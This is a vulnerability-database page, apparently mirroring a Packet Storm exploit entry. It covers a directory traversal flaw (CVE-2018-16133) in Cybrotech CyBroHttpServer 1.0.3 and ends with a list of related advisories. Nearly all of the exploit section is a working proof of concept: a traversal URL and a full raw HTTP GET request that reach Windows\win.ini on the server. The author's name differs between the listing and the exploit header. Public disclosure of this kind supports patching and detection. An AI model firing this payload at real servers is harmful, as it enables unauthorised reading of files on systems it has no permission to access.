Lucene search
Emre OVUNCPACKETSTORM:149177HistoryAug 31, 2018 - 12:00 a.m.
Cybrotech CyBroHttpServer 1.0.3 Directory Traversal
2018-08-3100:00:00
Emre OVUNC
packetstormsecurity.com
56
EPSS
0.036
Percentile
91.7%
`# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre AVANA
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133
# PoC
https://<host>\..\..\..\..\Windows\win.ini
# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png
GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
`
Related
prion
prion
Directory traversal
2018-08-29 22:29:00
exploitpack
exploitpack
Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
2018-08-30 00:00:00
nvd
nvd
CVE-2018-16133
2018-08-29 22:29:00
zdt
zdt
Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal Vulnerability
2018-08-30 00:00:00
exploitdb
exploitdb
Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
2018-08-30 00:00:00
cve
cve
CVE-2018-16133
2018-08-29 22:29:00
cvelist
cvelist
CVE-2018-16133
2018-08-29 22:00:00
nuclei
nuclei
Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
2021-12-01 02:26:56